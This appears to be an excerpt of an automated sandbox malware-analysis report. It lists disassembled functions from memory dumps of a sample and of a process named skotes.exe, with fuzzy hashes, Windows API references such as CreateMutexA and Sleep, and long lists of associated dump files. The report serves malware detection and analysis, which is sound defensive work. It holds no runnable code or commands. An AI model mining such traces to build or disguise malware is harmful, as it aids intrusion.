Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 505c420892bc074f44356a8ee0333c719bc342d1f5a295b6bfa74005946dc9cb
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 0B112B77200187C7EE04AA2DC8B45B7A799FBC73217AC437AD042EB758DA22D9459620

Function 05120D04 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761836547.0000000005120000.00000040.00001000.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5120000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f90b02466274202e03be5a0b0daf0e044c74786e1589cec572cb62c85e83ea3b
Instruction ID: 516ee1de20d78b53b9cf8003fa6cc79fa8bac8bc7c54788de9b9084d5b0eac9e
Opcode Fuzzy Hash: f90b02466274202e03be5a0b0daf0e044c74786e1589cec572cb62c85e83ea3b
Instruction Fuzzy Hash: 96E039EB54C2643D311691923B68AFBAA6DD4C6B70331C43BFC02E240AE2C90E495031

Function 0088A302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 868accf262a2583ea74754cde63ab2171f5604b66f9fcbefab78ebb254eb139b
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 92E08C32921228EBCB18EB9CC90498AF7ECFB49B01F650096F501D3290C370DE00C7D1

Function 0088CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0088CC66

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: 1ed9b8bc4f4848ce6bb9be1ed9af0c686941a6e71de0ccf75485881ca09f7a44
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: EBB1373290464A9FDB11EF68C881BAEBFE5FF45340F14816AE855EB24AD6349D01CB71

Function 00852EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00852F5F
__Mtx_unlock.LIBCPMT ref: 00852FCC
__Mtx_unlock.LIBCPMT ref: 008530F5
__Mtx_unlock.LIBCPMT ref: 0085319B

Memory Dump Source

Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true

Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_850000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 655adaa5f57e0e1e5c67fa756c4031801738c3d6c0971db7508e15bd17e507b9
Instruction ID: a5238d0e5661b87a5e8927741075090069a0f1a8443c01432fb28a42f51e61ab
Opcode Fuzzy Hash: 655adaa5f57e0e1e5c67fa756c4031801738c3d6c0971db7508e15bd17e507b9
Instruction Fuzzy Hash: FAA1C0B0A01715AFDB20DB79C944B6AB7A8FF15356F048129EC15D7281EB35EA08CBD2

Analysis Process: skotes.exePID: 7824, Parent PID: 7624COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1875
Total number of Limit Nodes:	9

Executed Functions

Function 009D652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,009D652A,?,?,?,?,?,009D7661), ref: 009D6566

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: dcc8cc19ac10dc6b3d0f479ef99fed2c643fe36b9ff44ba63fb22faf800916b7
Instruction ID: cbc40f800a8bff10f1bb63e54fb09e7342020953599656e33b0e401e20f98823
Opcode Fuzzy Hash: dcc8cc19ac10dc6b3d0f479ef99fed2c643fe36b9ff44ba63fb22faf800916b7
Instruction Fuzzy Hash: 8FE08C31181148AFCF26BF58D80DE483B6AEFA1781F008811F9145A326CB26DE82CA80

Function 009A9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009AA963
CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981

Memory Dump Source

Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 537a3bdb0f0b22bb3ad4caeadc4440a7e5484cfdaba4fd719b15cebf2d769a72
Instruction ID: 62df2d40bdcef634ffb27f3aef92814c13be4eaee6f163af8266a292883fbc04
Opcode Fuzzy Hash: 537a3bdb0f0b22bb3ad4caeadc4440a7e5484cfdaba4fd719b15cebf2d769a72
